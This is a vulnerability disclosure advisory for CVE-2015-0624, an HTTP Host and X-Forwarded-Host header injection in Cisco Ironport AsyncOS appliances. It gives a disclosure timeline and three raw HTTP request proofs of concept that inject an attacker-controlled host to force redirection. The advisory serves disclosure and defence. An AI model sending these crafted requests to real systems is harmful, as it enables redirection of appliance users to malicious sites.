Cisco Ironport AsyncOS HTTP Header Injection

`Cisco Ironport AsyncOS HTTP Header Injection  
Vendor: Cisco  
Product webpage: http://www.cisco.com  
Affected version(s):   
Cisco Ironport ESA - AsyncOS 8.0.1-023  
Cisco Ironport WSA - AsyncOS 8.5.5-021  
Cisco Ironport SMA - AsyncOS 8.4.0-138  
Date: 24/02/2015  
Credits: Glafkos Charalambous  
CVE: CVE-2015-0624  
  
Disclosure Timeline:  
28-10-2014: Vendor Notification  
28-10-2014: Vendor Response/Feedback  
22-01-2015: Vendor Fix/Patch  
20-02-2015: Vendor Advisory Release  
24-02-2015: Public Disclosure  
  
Description:  
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation   
of user supplied input when handling HTTP Host and X-Forwarded-Host request headers.  
  
An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a   
malicious website.  
  
PoC #1  
  
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
DNT: 1  
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd  
Connection: keep-alive  
Content-Length: 0  
Host: ironport:8443:@[attacker.com]  
  
PoC #2  
  
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
DNT: 1  
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd  
Connection: keep-alive  
Content-Length: 0  
Host: [attacker.com]  
  
PoC #3  
  
GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
DNT: 1  
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd  
Connection: keep-alive  
Host: ironport:8443  
X-Forwarded-Host: [attacker.com]  
  
  
References:   
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.22 (MingW32)   
  
mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u  
xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x  
Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj  
KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe  
JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB  
AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF  
AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ  
M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z  
S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE  
n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d  
V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL  
2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI=  
=yiro  
-----END PGP SIGNATURE-----  
  
`